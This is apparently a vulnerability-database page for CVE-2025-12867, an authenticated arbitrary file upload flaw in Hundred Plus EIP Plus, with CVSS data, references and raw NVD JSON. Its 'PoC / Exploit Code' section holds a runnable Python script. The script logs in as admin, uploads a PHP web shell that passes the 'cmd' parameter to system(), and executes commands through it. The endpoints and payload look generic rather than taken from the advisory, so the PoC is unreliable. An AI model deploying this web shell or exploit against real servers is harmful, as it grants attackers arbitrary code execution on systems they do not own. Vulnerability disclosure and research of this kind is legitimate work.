CVE-2025-12867

Description

EIP Plus developed by Hundred Plus has an Arbitrary File Uplaod vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EIP Plus (all versions prior to security patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12867 PoC - EIP Plus Arbitrary File Upload
# This PoC demonstrates the arbitrary file upload vulnerability in EIP Plus
# Requirements: requests library

import requests
import json

TARGET_URL = "http://target-server.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/api/auth/login"
UPLOAD_URL = f"{TARGET_URL}/api/file/upload"

# Authentication credentials (high privilege account required)
credentials = {
    "username": "admin",
    "password": "password123"
}

# PHP WebShell payload
webshell_content = """<?php
if(isset($_REQUEST['cmd'])) {
    echo '<pre>';
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo '</pre>';
    die;
}
?>
"""

def exploit():
    # Step 1: Authenticate with high privilege account
    session = requests.Session()
    login_response = session.post(LOGIN_URL, json=credentials)
    
    if login_response.status_code != 200:
        print("[-] Authentication failed")
        return
    
    print("[+] Authentication successful")
    
    # Step 2: Upload malicious file
    files = {
        'file': ('shell.php', webshell_content, 'application/x-php')
    }
    
    upload_response = session.post(UPLOAD_URL, files=files)
    
    if upload_response.status_code == 200:
        result = upload_response.json()
        uploaded_path = result.get('file_path', '')
        print(f"[+] File uploaded successfully: {uploaded_path}")
        
        # Step 3: Execute commands via WebShell
        shell_url = f"{TARGET_URL}/{uploaded_path}"
        print(f"[+] WebShell accessible at: {shell_url}")
        print("[+] Example command: curl -X GET \"?cmd=whoami\"\n")
        
        # Test command execution
        test_response = session.get(f"{shell_url}?cmd=whoami")
        print(f"[+] Command output: {test_response.text}")
    else:
        print(f"[-] Upload failed: {upload_response.status_code}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12867
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12867
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12867/
[4] VulDB https://vuldb.com/cve/CVE-2025-12867
[5] https://www.twcert.org.tw/en/cp-139-10491-004b0-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10490-2534b-1.html
[7] https://www.chtsecurity.com/news/20848f61-9db5-44fd-8574-c9d6a54e4010

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12867", "sourceIdentifier": "[email protected]", "published": "2025-11-10T04:15:41.360", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EIP Plus developed by Hundred Plus has an Arbitrary File Uplaod vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10491-004b0-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10490-2534b-1.html", "source": "[email protected]"}, {"url": "https://www.chtsecurity.com/news/20848f61-9db5-44fd-8574-c9d6a54e4010", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}